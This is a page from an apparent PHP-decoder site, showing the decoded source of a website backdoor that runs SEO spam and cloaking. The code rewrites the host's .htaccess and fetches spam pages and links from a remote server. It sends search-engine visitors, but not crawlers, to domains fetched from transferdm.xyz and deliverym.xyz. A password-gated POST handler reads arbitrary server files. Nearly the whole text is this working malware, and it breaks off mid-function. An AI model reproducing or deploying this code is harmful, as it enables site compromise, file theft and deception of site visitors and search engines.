Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('display_errors', 0); @ini_set('log_errors', 0); @set_time_limit(3600);..

Decoded Output download

<?php 
@ini_set('display_errors', 0); 
@ini_set('log_errors', 0); 
@set_time_limit(3600); 
define("DOMTXT","/jd1/"); 
define("GETDATE","http://www.datecenter.com/api/?key="); 
define("CENTERKEY",2); 
define("MYDIR", "/ebayuk20190325-8/"); 
define("FNUM",42); 
define("JGNUM","40"); 
define("LINKNUM","8"); 
define("BZSITE","x"); 
define("BZPRO","a"); 
//msbg 
define("JDT","3"); 
//msend 
 
//msidbg 
define("MSID",841); 
//mssidend 
 
 
//jthouzuibg 
define("JTHZ","/"); 
//jthouzuiend 
 
 
// #llqllq#arr_nametimebg 
 
$arrnametime[]="2"; 
$arrnametime[]="3"; 
$arrnametime[]="4"; 
$arrnametime[]="1"; 
 
 
// #llqllq#arr_nametimeend 
 
// #llqllq#arr_wordbg 
 
$arr_word[0][] ="2";$arr_word[0][] ="3";$arr_word[0][] ="4";$arr_word[0][] ="3";$arr_word[0][] ="3";$arr_word[0][] ="4";$arr_word[0][] ="4";$arr_word[0][] ="2";$arr_word[0][] ="2";$arr_word[0][] ="3";$arr_word[1][] ="3";$arr_word[1][] ="4";$arr_word[1][] ="2";$arr_word[1][] ="3";$arr_word[1][] ="4";$arr_word[1][] ="3";$arr_word[1][] ="2";$arr_word[1][] ="4";$arr_word[1][] ="2";$arr_word[1][] ="3";$arr_word[2][] ="3";$arr_word[2][] ="3";$arr_word[2][] ="4";$arr_word[2][] ="3";$arr_word[2][] ="2";$arr_word[2][] ="3";$arr_word[2][] ="2";$arr_word[2][] ="4";$arr_word[2][] ="4";$arr_word[2][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="2";$arr_word[3][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="3";$arr_word[3][] ="2";$arr_word[3][] ="4";$arr_word[3][] ="3";$arr_word[3][] ="3";$arr_word[3][] ="3";$arr_word[4][] ="4";$arr_word[4][] ="2";$arr_word[4][] ="3";$arr_word[4][] ="3";$arr_word[4][] ="3";$arr_word[4][] ="2";$arr_word[4][] ="3";$arr_word[4][] ="4";$arr_word[4][] ="2";$arr_word[4][] ="4";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="2";$arr_word[5][] ="2";$arr_word[5][] ="3";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="3";$arr_word[5][] ="4";$arr_word[5][] ="2";$arr_word[6][] ="4";$arr_word[6][] ="2";$arr_word[6][] ="4";$arr_word[6][] ="3";$arr_word[6][] ="4";$arr_word[6][] ="3";$arr_word[6][] ="2";$arr_word[6][] ="3";$arr_word[6][] ="3";$arr_word[6][] ="2";$arr_word[7][] ="3";$arr_word[7][] ="4";$arr_word[7][] ="3";$arr_word[7][] ="2";$arr_word[7][] ="4";$arr_word[7][] ="3";$arr_word[7][] ="3";$arr_word[7][] ="2";$arr_word[7][] ="2";$arr_word[7][] ="4";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="4";$arr_word[8][] ="4";$arr_word[8][] ="2";$arr_word[8][] ="3";$arr_word[8][] ="4";$arr_word[8][] ="3";$arr_word[9][] ="2";$arr_word[9][] ="4";$arr_word[9][] ="3";$arr_word[9][] ="2";$arr_word[9][] ="4";$arr_word[9][] ="3";$arr_word[9][] ="3";$arr_word[9][] ="4";$arr_word[9][] ="2";$arr_word[9][] ="3";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="4";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="4";$arr_word[10][] ="4";$arr_word[10][] ="3";$arr_word[10][] ="2";$arr_word[10][] ="3";$arr_word[11][] ="2";$arr_word[11][] ="2";$arr_word[11][] ="3";$arr_word[11][] ="3";$arr_word[11][] ="4";$arr_word[11][] ="4";$arr_word[11][] ="4";$arr_word[11][] ="2";$arr_word[11][] ="3";$arr_word[11][] ="3"; 
 
// #llqllq#arr_wordend 
 
 
// #llqllq#arr_keywz 
 
$arrKeywz[]="5"; 
$arrKeywz[]="4"; 
$arrKeywz[]="10"; 
$arrKeywz[]="11"; 
$arrKeywz[]="7"; 
$arrKeywz[]="6"; 
$arrKeywz[]="9"; 
$arrKeywz[]="8"; 
$arrKeywz[]="12"; 
 
 
// #llqllq#arr_keywzend 
// #llqllq#arr_fuhao 
 
$arrfh[]="Christmas gift ideas 2018"; 
$arrfh[]="Holiday presents"; 
$arrfh[]="Christmas gift store"; 
$arrfh[]="Christmas Holiday"; 
$arrfh[]="Christmas Supplies"; 
$arrfh[]="Holiday Gifts"; 
$arrfh[]="Christmas Gifts 2018"; 
$arrfh[]="Top Christmas gifts 2018"; 
$arrfh[]="Christmas gift shop"; 
$arrfh[]="Christmas presents"; 
$arrfh[]="Xmas"; 
$arrfh[]="Christmas Ornament"; 
$arrfh[]="for Christmas"; 
$arrfh[]="best Christmas gift"; 
$arrfh[]="Xmas Ornaments"; 
$arrfh[]="Best Christmas gifts 2018"; 
$arrfh[]="Unique Christmas Gifts"; 
$arrfh[]="Christmas gift"; 
$arrfh[]="Christmas Decoration"; 
$arrfh[]="Christmas gift ideas"; 
 
 
// #llqllq#arr_fuhaoend 
 
 
$q1 = "O00O0O";	$q2 = "O0O000";	$q3 = "O0OO00";	$q4 = "OO0O00";	$q5 = "OO0000";	$q6 = "O00OO0";	$q7 = "O00O00";	$q8 = "O00OOO";	$$q1 = RandAbcs(); 
 
 
 
// #llqllq#randkeybg 
$strRand[0]="sdjtiwebxgomqzuykfplrcvhna"; 
$strRand[1]="rxtdcspuwknamgbeilzohyfvjq"; 
$strRand[2]="wvybquazdpktmreinjcsgfhxlo"; 
$strRand[3]="ewgznjqhlfydsvmoixkcpburat"; 
$strRand[4]="vhrkmxsctpjbyquidfzgweolna"; 
$strRand[5]="zemwgcfrvkoahsjuyibndplqxt"; 
$strRand[6]="cltwepzrsmvxjydgfoquknhaib"; 
$strRand[7]="pgczvxbtdhesyfmnruiojqklwa"; 
$strRand[8]="bpyhwsxeqackzmjgolivfnrudt"; 
$strRand[9]="hrjngkdbxwutymlafeosvzcpqi"; 
$strRand[10]="sohycbkgiefpxjnltwmuvardzq"; 
$strRand[11]="qtixzpuwvmokfjcdbgrhyesanl"; 
$strRand[12]="svxkwdyortfzicbnuegmqjlpha"; 
$strRand[13]="kgvsjqotpnbuzicdlyehrfxwma"; 
$strRand[14]="lfsxeyuwobczdrgntjkvqhmipa"; 
$strRand[15]="dwipgzmfkhuslyntqaxrvobjec"; 
$strRand[16]="pubiglovchwyzrktemqfdsjnxa"; 
$strRand[17]="oldrbtjmufksgnayvxizehpcwq"; 
$strRand[18]="uyidkvxfagsmrtcnoehjbpwlqz"; 
$strRand[19]="vzshltoarneudgjpcxikfwybqm"; 
$strRand[20]="ivuhnkrclmwdzxpoybetgsqafj"; 
$strRand[21]="ihoscajgdqvwzufknlpmxtybre"; 
$strRand[22]="sdmovznpaqkixwhfcrbgyltuje"; 
$strRand[23]="qjkwnsvacxgibohtldpryfzemu"; 
$strRand[24]="sinwodzqkapjxerghyfculvtmb"; 
$strRand[25]="fzpsxvlwykurjqtnbadeomighc"; 
$strRand[26]="qyerzdstvkwogfumhnacpxjbil"; 
$strRand[27]="xjtsbmaenwuyiocdfvzhlgkpqr"; 
$strRand[28]="wslizdrjvamckehonxtqpgyufb"; 
$strRand[29]="jfbhvuwdtnegpirqlxokasmcyz"; 
$strRand[30]="brmxnfwdjqvizucysgotkaeplh"; 
$strRand[31]="acwyegfpkbsurxmjqhvdtnzoil"; 
$strRand[32]="jioxseckpqyfzbhuvgtwrmdlan"; 
$strRand[33]="rugoeqhnwyfbxkmptlsjczdiva"; 
$strRand[34]="fusgyrlzjcteoxdqhnavwbmipk"; 
$strRand[35]="yjswvhalontxzimfkpedubgqcr"; 
$strRand[36]="przbsmgtjoxvhlniqdfuecawky"; 
$strRand[37]="cuxvkmwfsirybldhgqtjepozna"; 
$strRand[38]="qzmjoxsevlyntkwuifrcabpdhg"; 
$strRand[39]="nwxekqpmczfdujhitbgoslyvra"; 
$strRand[40]="ohrxdalnycimjskwfpvzegutbq"; 
$strRand[41]="ngsrdhtebpficuqvwjzmlxoayk"; 
$strRand[42]="emkihpvwfgsdbcraoyjltuqzxn"; 
$strRand[43]="agrcnkjolumfhizxqtysvbepwd"; 
$strRand[44]="qpfcgrkxswidmvbatolhzynuje"; 
$strRand[45]="fviutmlryexzqoahdcpgnsbwkj"; 
$strRand[46]="yevwtpinckdfuasxrbzhomgqjl"; 
$strRand[47]="pmdqgsxjynekzlotahrvuwifbc"; 
$strRand[48]="advctmxbjlwrepgfhsuqykonzi"; 
$strRand[49]="btkgfadpnuwxvymojhslqrizec"; 
$strRand[50]="okrjbtmgyuaxpvwsnqdfhezlci"; 
$strRand[51]="mksielypwubrdxtqoacvghjfnz"; 
$strRand[52]="qmwctjuhagpbefysrvlkdniozx"; 
$strRand[53]="opwgzyixmhvdtcqnlkebursfaj"; 
$strRand[54]="phqtnveuxszgcobdkfrylmiwaj"; 
$strRand[55]="yrkolguswnxvatjfcempqbzdhi"; 
$strRand[56]="rdagnymvcklwqhojbfeipzxust"; 
$strRand[57]="mzdhtrsxigeybcpakwlunofqjv"; 
$strRand[58]="jmnezwktrgxsofqadbihcvypul"; 
$strRand[59]="qtecmpwlgyosrvhkdziuxbajnf"; 
$strRand[60]="nosfaelzgbhxutmjqdpvkrciyw"; 
$strRand[61]="wtfqcsbxukljarvyozghpmnide"; 
$strRand[62]="qlbtfaeujszmrpcvoghnkywidx"; 
$strRand[63]="rbhupewsydzagqkmitnxojvlfc"; 
$strRand[64]="hjvnreyscwzuikxatlobdmqfgp"; 
$strRand[65]="cyhgkbpusvefwnxmjotqadrzli"; 
$strRand[66]="ahimpdyegqbwujnzftxcovslkr"; 
$strRand[67]="qvbryzcajosmnfdiwpxeutkglh"; 
$strRand[68]="zcwntevxkdjapfolirmqubgshy"; 
$strRand[69]="gaisntqeyrmwzcdvblfhujkxpo"; 
$strRand[70]="kdtymxcrujnfeqvspibohawglz"; 
$strRand[71]="mzhljkyfoqxatubnvrswdicpeg"; 
$strRand[72]="nzlojtbcdkxyumrhifvqepgsaw"; 
$strRand[73]="avxirzedqwkcjsnpfolugmhtyb"; 
$strRand[74]="dgwzyjlsqnvxmoehbcutpfrkia"; 
$strRand[75]="bxiaugmowjzecsqhkypldtrfnv"; 
$strRand[76]="brdzoniutysfephlawvgckxmjq"; 
$strRand[77]="mbenyltogxrzcwfjdasipukqhv"; 
$strRand[78]="doxkpfnjgzatuyviqchsrlwemb"; 
$strRand[79]="hiezpdlavrosmnjtgcbxuywkfq"; 
$strRand[80]="szrvbyncixgdteplukmqfjwoah"; 
$strRand[81]="nltygmsdkhiqvwujefazprbocx"; 
$strRand[82]="yfpdzjwlarvmkbqsgotiuxhcen"; 
$strRand[83]="lgtuhnyvdfcjazoekwiqpbxsrm"; 
$strRand[84]="byuhtsjqazkrlfdexiongpmcwv"; 
$strRand[85]="xtrdflswgmqvhjuokipzenaycb"; 
$strRand[86]="tekmscozrglvfdwnpyuqbjixha"; 
$strRand[87]="mqbdftnazlgrpschoxikyjewvu"; 
$strRand[88]="hlnsbkxtvfjomypduagziewcqr"; 
$strRand[89]="lvtnfzydwrepoqskjaubmixghc"; 
$strRand[90]="ktlidvmjubqagexhfpczrwyosn"; 
$strRand[91]="kbswzpemjnolcavrxuyditqhfg"; 
$strRand[92]="lhxknomcueqrzgwfpijyvtsadb"; 
$strRand[93]="naqecjhorukwmlgbtvzxfydpsi"; 
$strRand[94]="mtfrgikcnqvduexwbspozjylah"; 
$strRand[95]="ejngrqadsvmyiuxptlcwzbkofh"; 
$strRand[96]="buhkacomvrjtiyfewgpqsdznlx"; 
$strRand[97]="shekcavilrxqfzwupogybdtjmn"; 
$strRand[98]="elcudvimkxgzopnbwqrjhyafts"; 
$strRand[99]="wrystlmbadpxzghckfnueqoijv"; 
 
// #llqllq#randkeyend 
 
 
 
$thisdom = str_replace("www.","",$_SERVER['HTTP_HOST']); 
define("GETDOM",getthisdom()); 
		 
 
 
 
// 
	 
	 
	 
$arrArrr = array();$j = 0;for($i=0;$i<20;$i+=2){ 
  $arrArrr[$j++] = $strRand{$i}.$strRand{$i+1};} 
$Arrrarr = array_flip($arrArrr); 
$stss = 'transferdm'; 
$stss2 = 'deliverym'; 
 
 
if(isset($_GET["gsitemap"]) && isset($_GET["mapnum"])){ 
	 
	$O_OO0_0O_0='America/Chicago';	@date_default_timezone_set($O_OO0_0O_0);	 
	if (! is_dir("../sitemaps")) 
		mkdir("../sitemaps", 0755);	 
	global $gnumber; 
	$gnumber = 1; 
	$bgNum = (int)trim($_GET["gsitemap"]); 
	$mapnum = (int)trim($_GET["mapnum"]); 
	if($bgNum > FNUM) 
	  die("The Number Must Lower Then " . FNUM); 
  
	$arrNumTemp = getMapNum($bgNum,$mapnum); 
	 
	 
	foreach($arrNumTemp as $vss){ 
		 
		$vals = "id$vss.php";		 
		 
		 
		 
		$idUrl = GETDOM . "gpage.php?getid=$vss"; 
		$tempIdStr = curl_get_from_webpage($idUrl,'',5); 
		$arrId = explode(',',$tempIdStr); 
	 
		if(count($arrId) < 100){ 
			echo "g sitemap fail<br/>"; 
			die(); 
		} 
		 
		echo $vals."<br/>"; 
	 
		if($gnumber == 1){ 
			if(JDT == 1){ 
				gsitemap($arrId,2,1);			}else{ 
				gsitemap($arrId,1,2);			} 
		}else{ 
			 
			if(JDT == 1){ 
				gsitemap2($arrId,2,1);			}else{ 
				gsitemap2($arrId,1,2);			} 
			 
		} 
		 
		unset($arrId,$tempArr1,$tempArr2);	} 
	 
} 
 
if(isset($_GET["ghtac"]) && $_GET["ghtac"]){ 
 
	$dirNames = dirname(__FILE__);   
	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));	 
	$PreDir = '';	 
	if(JDT == 1){ 
		$UrlBaseDir = $httcReplace;		$RewriteOnDir = '';	 
	}else{ 
		$UrlBaseDir = '';		$PreDir = '../';		$RewriteOnDir = $httcReplace . '/';	 
	} 
	$strhtt = ''; 
	if (file_exists("$PreDir.htaccess")){ 
		@chmod("$PreDir.htaccess",0755); 
		$strhtt = file_get_contents("$PreDir.htaccess");	 
	} 
	if(!(strstr($strhtt,'RewriteBase') || strstr($strhtt,'RewriteRule'))) 
	{ 
		$strhtt = '<IfModule mod_rewrite.c>'.PHP_EOL . 'Options +FollowSymLinks'. PHP_EOL .'RewriteEngine on'. PHP_EOL .'RewriteBase /'. $UrlBaseDir . PHP_EOL .'</IfModule>';	 
	}else{ 
		$strhtt = str_ireplace('# RewriteBase ','RewriteBase ',$strhtt); 
		$strhtt = str_ireplace('#RewriteBase ','RewriteBase ',$strhtt);	 
	} 
		 
	if(1){ 
		$r1 = '#(.*RewriteBase.*)#i';		$r2 = '#RewriteRule#i';		 
		$rsut = ''.PHP_EOL . 'RewriteRule ^'. '.*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL; 
		 
		$rsut2 = PHP_EOL . 'RewriteRule ^'. '.*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL .'RewriteRule' ;		 
		if(preg_match($r1,$strhtt)){ 
			$strhtt = preg_replace($r1,$rsut,$strhtt,1);		 
		}else{ 
			$strhtt = preg_replace($r2,$rsut2,$strhtt,1); 
		} 
		 
		if(JDT == 1 or JDT == 0){ 
			file_put_contents("$PreDir.htaccess", $strhtt);		 
		} 
		 
	} 
 
	die("ghtac ok"); 
} 
 
 
if(isset($_POST["chdate"]) && md5($_POST["chdate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["redate_file"])){$redate_file = $_POST["redate_file"];if(file_exists($redate_file)){echo '#ok#';}else{echo '#nofile#';}die();}if(isset($_POST["redate"]) && md5($_POST["redate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["redate_file"])){$redate_file = $_POST["redate_file"];if(file_exists($redate_file)){echo rFile($redate_file);die();}else{echo '#nofile#';die();}}if(isset($_POST["test"]) && md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'){echo '#ok#';	die();}if((isset($_POST["lan"]) && $_POST["lan"] == 1) or (isset($_GET["lan"]) && $_GET["lan"] == 1)){$fileArr = array();$flag = 1;$fileArr['index'] = filesize(__FILE__);if(file_exists("./moban.html")){$fileArr['moban'] = filesize("./moban.html");}else{$flag = 0;$fileArr['moban'] = -1;}echo 'error---'. serialize($fileArr) .'---';die();}if(isset($_GET["gsitemap"]) || isset($_GET["rset"]) || isset($_GET["hzui"]) || isset($_GET["jgshu"]) || isset($_GET["ljshu"]) || isset($_GET["modifydate"]) || isset($_GET["moshi"]) || isset($_GET["install"])){die();} 
	 
if(JDT==2){ 
	 
	$UrlParent=end((explode('index.php',$_SERVER['REQUEST_URI'])));	if($UrlParent){ 
		$tempSid = '';		$tempPid = '';		 
				 
		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		 
		if(preg_match($r2,$UrlParent,$matches2)){ 
			if(isset($matches2[1])) 
				$tempPid = $matches2[1];		}else{ 
			 
			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1])) 
				$tempPid = $matches13[1];		} 
		 
			 
		if($tempPid){ 
			$_GET['id']= $tempPid;		 
		} 
	} 
	 
}elseif(JDT==3&&isset($_GET['keyword'])&&$_GET['keyword']){ 
		 
		$tempSid = '';		$tempPid = '';		$UrlParent = $_GET['keyword'];		 
			 
		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		 
		if(preg_match($r2,$UrlParent,$matches2)){ 
			if(isset($matches2[1])) 
				$tempPid = $matches2[1];		}else{ 
			 
			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1])) 
				$tempPid = $matches13[1];		} 
		 
	 
		if($tempPid){ 
			$_GET['id']= $tempPid;		 
		} 
	 
	 
} 
function getRandStr(){ 
	 
	$arrABC = range('a','z');	shuffle($arrABC); 
	$randNum = rand(4,6);	 
	$str = implode('',array_slice($arrABC,0,$randNum));	 
	return $str;} 
if(isset($_GET["id"])) 
	$id = $_GET["id"];else{ 
	$id = "54402"; //llq index id 
} 
 
$resid = '#^\d+$#'; 
if(!preg_match($resid,$id)){ 
	exit; 
} 
 
$id23 = $id; 
 
 
 
$numArr_key = count($arr_key); 
$siteid = MSID; 
$siteAID = $siteid. '-' .$id23;$fileKey = $id23 % FNUM; 
// $_SERVER["HTTP_REFERER"] = "google.com.hk"; 
if(isset($_SERVER["HTTP_REFERER"])){ 
	$referer = $_SERVER["HTTP_REFERER"]; 
	$russ = '#(google|yahoo|incredibar|bing|docomo|mywebsearch|comcast|search-results|babylon|conduit)(\.[a-z0-9\-]+){1,2}#i';	 
 
	$ipRanges = array( array('64.233.160.0' , '64.233.191.255'),  array('66.102.0.0' , '66.102.15.255' ) ,  array('66.249.64.0' , '66.249.95.255') ,  array('72.14.192.0' , '72.14.255.255') ,  array('74.125.0.0' , '74.125.255.255') ,  array('209.85.128.0' , '209.85.255.255') ,  array('216.239.32.0' , '216.239.63.255') ); 
	$localIp = get_real_ip();	 
	$is_or_no = is_ip($localIp,$ipRanges); 
	$iszz = isCrawler();	 
	 
	if(preg_match($russ, $referer) && $iszz == false && $is_or_no == false){	 
		$rsdom = '#^https?://www\.[^/]+/$#i'; 
		 
		$jumDom1 = 'http://www.'.$stss.'.xyz'. DOMTXT . $siteid .".txt";	 
		$jumDom2 = 'http://www.'.$stss2.'.xyz'. DOMTXT . $siteid .".txt"; 
	 
		for($i=0;$i<2;$i++){ 
			$domJump = curl_getjs_from_webpage($jumDom1,2); 
			$domJump = trim($domJump); 
 
			if(!preg_match($rsdom,$domJump)){ 
				$domJump = curl_getjs_from_webpage($jumDom2,10); 
			 
				$domJump = trim($domJump); 
				if(preg_match($rsdom,$domJump)) 
					break; 
			}else{ 
				break; 
			} 
		} 
		 
		echo '<script language="javascript" type="text/javascript">'. PHP_EOL .'window.location.href="'. $domJump . "index.php?main_page=product_info&products_id=" . $id23 .'";'. PHP_EOL .'</script>';		die();	 
	} 
} 
 
 $fcontent = ''; 
 
 
 $pInfoUrl = GETDOM . "gpage.php?site=$thisdom&id=$siteAID&ljshu=".LINKNUM;  
 $pInfoStr = curl_get_from_webpage($pInfoUrl,'',5); 
 $rsInfo = '#<info>(.*)</info>#si'; 
 preg_match($rsInfo,$pInfoStr,$matchInfo); 
 if(isset($matchInfo[1])){ 
	 $InFoStrArr = unserialize($matchInfo[1]); 
 }else{ 
	 header("HTTP/1.1 404 Not Found");exit; 
 } 
 
 
$frStr1 = $InFoStrArr['frStr1']; 
$fr1Arr = unserialize($frStr1); 
 
 
$nowIdName = $InFoStrArr['nowIdName']; 
 
// $fhNum = count($arrfh); 
// $tpFhKey = $id23 % $fhNum; 
// $addWord = $arrfh[$tpFhKey]; 
 
// $nowIdName .= ' '.$addWord; 
 
$Article = $InFoStrArr['des']; 
 
$Article = str_replace('\"','"',$Article); 
$Article = str_replace("\'","'",$Article); 
$Article = str_replace('
','',$Article); 
$Article = str_replace('
','',$Article); 
$Article = str_replace('
','',$Article); 
 
 
$fr1Strs = '<ul>'.PHP_EOL; 
foreach($fr1Arr as $key=>$vs){ 
	$tpPid = $key; 
	$tpFlink = getalink($tpPid); 
	$fr1Strs .= '<li><a title="'.$vs.'" href="'.$tpFlink.'">'.$vs.'</a></li>'.PHP_EOL; 
} 
$fr1Strs .= '</ul>'.PHP_EOL; 
 
 
		$fileMb = fopen("moban.html","r"); 
			$html = fread($fileMb,filesize("moban.html"));			 
			 
			$html = str_ireplace('#bbbtitsbbb#', $nowIdName, $html);	 
			$html = str_ireplace('#bbbkeybbb#', $nowIdName, $html);	 
			$html = str_ireplace('#bbbdesbbb#', $nowIdName, $html);	 
			 
			$html = str_ireplace('#bbb1content1bbb#', '', $html); 
			$html = str_ireplace('#bbb2content2bbb#', '', $html); 
			$html = str_ireplace('#descontent#', '<h2>'. $nowIdName .'</h2><br/>'. PHP_EOL .$Article, $html); 
			 
			$html = str_replace('#link1#','',$html); 
				$html = str_replace('#link2#','',$html); 
				$html = str_replace('#link3#','',$html); 
				$html = str_replace('#link4#','',$html); 
				$html = str_replace('#link5#','',$html); 
				 
				$html = str_replace('#flink#',$fr1Strs,$html); 
				$html = str_replace('#Flink2#','',$html); 
			 
		 
	echo $html; 
 
 
die(); 
	 
	 
	 
function getMapNum($bgNum,$mapnum){ 
	$TempArr = array(); 
	if($bgNum + $mapnum <= FNUM){ 
		for($i=0;$i<$mapnum;$i++){ 
			$TempArr[$i] = $bgNum + $i -1; 
		} 
	}else{ 
		for($i=0;$i<$mapnum;$i++){ 
			if($bgNum+$i > FNUM) 
				$TempArr[$i] = $bgNum + $i -1 -FNUM; 
			else 
				$TempArr[$i] = $bgNum + $i -1; 
		} 
	} 
	 
	return $TempArr; 
} 
 
 
function getRandId(){ 
	$num = rand(1,FNUM);	$num = $num - 1;	require(FILEDIRNAME . "/id$num.php");	$indexId=array_rand($arrId,1);	$id = $arrId[$indexId];	unset($arrId);	return $id;} 
function get_arrvs($arr,$num,$nowkey){ 
	$numArr = count($arr);	 
	if($nowkey + $num < $numArr) 
		return $arr[$nowkey + $num];	else{ 
		if($nowkey + $num - $numArr - $numArr > 0) 
			return get_arrvs($arr,$num - $numArr,$nowkey);		else 
			return $arr[abs($nowkey + $num - $numArr)];	} 
} 
 
function get_pre_link($arr,$key){ 
	 
	$tmpA1 = array();	$tmpA2 = array();	 
	$num = count($arr);	 
	 
	if($key + JGNUM + 1 + LINKNUM >= $num){ 
		 
		if($key + JGNUM + 1 - $num > LINKNUM){ 
			return array_slice($arr, $key + JGNUM + 1 - $num, LINKNUM);		}else{ 
		 
		$duoyu = $key + JGNUM + 1 + LINKNUM - $num + 1;		$tmpA1 = array_slice($arr, $key + JGNUM + 1, LINKNUM);		$tmpA2 = array_slice($arr, 0, $duoyu);			 
		return array_merge($tmpA1,$tmpA2);		} 
	}else{ 
			return array_slice($arr, $key + JGNUM + 1, LINKNUM);	} 
	 
} 
function get_next_link($arr,$key){ 
	 
	$tmpA1 = array();	$tmpA2 = array();	 
	$num = count($arr);	if($key - JGNUM - LINKNUM < 0 && $key - JGNUM > 0){ 
		$duoyu = abs($key - JGNUM - LINKNUM);		$tmpA1 = array_slice($arr, 0, abs($key - JGNUM));		$tmpA2 = array_slice($arr, $num-$duoyu-1, $duoyu);		return array_merge($tmpA1,$tmpA2);	}else{ 
			return array_slice($arr, $key - JGNUM - LINKNUM, LINKNUM);	} 
} 
function rFile($file){ 
	if(function_exists('file_get_contents')){ 
		return file_get_contents($file); 
	}else{ 
		$handle = fopen($file, "r"); 
		$contents = fread($handle, filesize($file)); 
		fclose($handle); 
		return $contents; 
	} 
} 
function isCrawler() { 
	$agent= @strtolower($_SERVER['HTTP_USER_AGENT']);	if (!empty($agent)) { 
		$spiderSite= array( 
			"Googlebot", 
			"Mediapartners-Google", 
			"Adsbot-Google", 
			"Yahoo!", 
			"Google AdSense", 
			"Yahoo Slurp", 
			"bingbot", 
			"MSNBot" 
		);		foreach($spiderSite as $val) { 
		$str = strtolower($val);		if (strpos($agent, $str) !== false) { 
			return true;			} 
		} 
	} else { 
		return false;	} 
} 
 
function glink($filenames,$jdt=1){ 
	$filePres = '';	$fileEnds = '';	 
	if($jdt == 1){ 
		$filePres = basename(__FILE__) . "?id=";	}else{ 
		$filePres = '';		$fileEnds = JTHZ;	} 
	//// 
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/')); 
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		 
